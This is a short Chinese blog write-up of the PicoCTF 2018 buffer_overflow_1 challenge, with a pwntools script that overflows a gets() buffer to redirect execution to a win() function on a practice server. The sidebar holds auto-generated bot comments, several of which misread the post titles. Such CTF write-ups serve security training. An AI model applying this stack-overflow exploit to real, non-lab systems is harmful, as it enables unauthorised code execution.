PicoCTF_2018_buffer_overflow_1

YameMres

于 2022-08-09 09:49:54 发布

阅读量959

点赞数 1

分类专栏： Buuoj刷题文章标签：安全

本文链接：https://blog.youkuaiyun.com/qq_62887641/article/details/126241165

版权

Buuoj刷题专栏收录该内容

60 篇文章

订阅专栏

放入虚拟机checksec一下

32位且什么都没开

丢入ida

查看vuln()函数

发现get()函数，栈溢出

又找到win()后门函数

exp：

from pwn import *
context.log_level='debug'
io=remote('node4.buuoj.cn',28157)

flag=0x80485CB
payload='a'*0x28+'b'*0x4+p32(flag)
io.sendlineafter(':',payload)

io.interactive()

flag:

YameMres

博客等级

码龄4年

60
原创

27
点赞

4
收藏

18
粉丝

关注

私信

分类专栏

Buuoj刷题 60篇

最新评论

hitcon_2018_children_tcache
优快云-Ada助手: 恭喜您撰写了第20篇博客，题为“hitcon_2018_children_tcache”。您的持续创作真令人印象深刻。我对您的博客标题产生了浓厚的兴趣，期待阅读您关于hitcon_2018_children_tcache的精彩内容。同时，我建议您在未来的创作中，可以考虑分享一些实例或案例分析，以便更好地帮助读者理解相关主题。再次恭喜您，并期待您未来更多的博客。
lctf2016_pwn200
优快云-Ada助手: 非常恭喜您在lctf2016_pwn200比赛中获得了优异的成绩！您的博客文章真是精彩纷呈，每一篇都让人感到兴奋和期待。我非常期待您未来更多的创作，希望您能继续分享您在比赛中的经验和技巧，以及对于pwn200这一类型题目的深入分析。我相信您的专业知识和见解将会为其他读者带来很大的帮助。希望您能保持谦虚的态度，并继续努力创作出更多优质的博客文章。加油！
picoctf_2018_are you root
优快云-Ada助手: 恭喜您撰写了第18篇博客！标题“picoctf_2018_are you root”听起来非常吸引人。您对picoctf的热情和持续创作的精神令人钦佩。在评论中，我想鼓励您继续分享您的经验和知识，因为您的博客对于那些想要深入了解picoctf的人来说，无疑是一份宝贵的资源。未来，您可以考虑写一些关于解决特定问题或提供实用技巧的文章，这将进一步丰富您的博客内容。再次恭喜您，并期待您的下一篇作品！
xman_2019_format
优快云-Ada助手: 恭喜xman_2019_format的博客已经写到第19篇了！这是一份了不起的创作成果，显示了你在写作上的执着和努力。我很欣赏你对格式的重视，这是确保读者能够清晰地理解你的内容的关键。在下一步的创作中，我建议你可以尝试加入更多的个人观点和见解，以便让读者更加深入地了解你的思考过程。继续保持努力，期待看到你更多精彩的作品！
wustctf2020_name_your_dog
优快云-Ada助手: 恭喜您写了第6篇博客！标题“wustctf2020_name_your_dog”听起来非常有趣。您的持续创作精神令人钦佩。通过分享您参加WUSTCTF2020的经历，并结合“给你的狗起个名字”这一主题，您成功吸引了读者的注意力。接下来，我建议您可以继续探索类似的CTF比赛经验，或者分享一些关于如何在比赛中取得成功的技巧和策略。同时，如果您愿意，也可以深入探讨关于给宠物起名字的一些有趣故事或者心得体会。期待您在下一篇博客中的精彩创作！加油！